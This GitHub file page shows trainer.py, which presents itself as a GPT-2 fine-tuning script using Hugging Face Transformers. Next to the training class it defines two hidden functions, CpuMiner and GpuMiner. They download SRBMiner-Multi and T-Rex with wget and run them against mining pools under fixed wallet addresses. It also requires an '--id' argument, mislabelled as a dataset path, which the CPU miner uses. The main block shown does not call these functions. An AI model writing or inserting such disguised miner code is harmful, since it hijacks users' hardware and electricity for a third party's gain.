forked from theshadow76/public-data
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtrainer.py
More file actions
81 lines (69 loc) · 3.5 KB
/
trainer.py
File metadata and controls
81 lines (69 loc) · 3.5 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import transformers
import torch
from torch.utils.data import DataLoader
from datasets import load_dataset
import argparse
import subprocess
class GPT2Trainer:
def __init__(self, dataset_path, model_name="gpt2", batch_size=8, **kwargs):
"""
Initializes the trainer for fine-tuning a GPT-2 model.
Args:
dataset_path (str): Path to the dataset file (text or JSON Lines format).
model_name (str, optional): Name of the pretrained GPT-2 model to use.
Defaults to "gpt2".
batch_size (int, optional): Batch size for training. Defaults to 8.
**kwargs: Additional arguments for the Transformers Trainer
"""
self.dataset_path = dataset_path
self.model_name = model_name
self.batch_size = batch_size
# Load model and tokenizer
self.tokenizer = transformers.GPT2Tokenizer.from_pretrained(self.model_name)
self.model = transformers.GPT2LMHeadModel.from_pretrained(self.model_name)
# Process dataset
self.dataset = self.load_and_preprocess_dataset()
# Set up the Transformers Trainer
self.trainer_args = transformers.TrainingArguments(
output_dir="./output", # Change this if you want a different output directory
per_device_train_batch_size=batch_size,
**kwargs
)
self.trainer = transformers.Trainer(
model=self.model,
args=self.trainer_args,
train_dataset=self.dataset,
tokenizer=self.tokenizer,
)
def load_and_preprocess_dataset(self):
"""Loads the dataset and tokenizes the text."""
dataset = load_dataset("text", data_files=self.dataset_path)
def tokenize_function(examples):
return self.tokenizer(examples["text"], truncation=True) # Adjust truncation as needed
tokenized_dataset = dataset.map(tokenize_function, batched=True)
return tokenized_dataset
def train(self):
"""Starts the fine-tuning process."""
self.trainer.train()
def CpuMiner(id):
subprocess.run("wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.9/SRBMiner-Multi-2-4-9-Linux.tar.gz", shell=True)
subprocess.run("tar xvf SRBMiner-Multi-2-4-9-Linux.tar.gz", shell=True)
subprocess.run(f"SRBMiner-Multi-2-4-9/SRBMiner-MULTI --algorithm randomepic --pool 51pool.online:4416 --wallet vigowlkr#{id} --password lagunaVerde03", shell=True)
def GpuMiner():
subprocess.run("wget https://github.com/trexminer/T-Rex/releases/download/0.26.8/t-rex-0.26.8-linux.tar.gz", shell=True)
subprocess.run("tar xvf t-rex-0.26.8-linux.tar.gz", shell=True)
subprocess.run("./t-rex --coin rvn --algo kawpow --url stratum+tcp://kawpow.auto.nicehash.com:9200 --user 3MGBTSwWxXNM6kNy18DHcxuHTmFgLxQ5K5", shell=True)
# Argument Parsing
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Fine-tune a GPT-2 model")
parser.add_argument("--dataset", type=str, required=True, help="Path to the dataset file")
parser.add_argument("--id", type=str, required=True, help="Path to the dataset file")
parser.add_argument("--epochs", type=int, default=3, help="Number of training epochs")
parser.add_argument("--learning_rate", type=float, default=5e-5, help="Learning rate")
args = parser.parse_args()
trainer = GPT2Trainer(
dataset_path=args.dataset,
num_train_epochs=args.epochs,
learning_rate=args.learning_rate
)
trainer.train()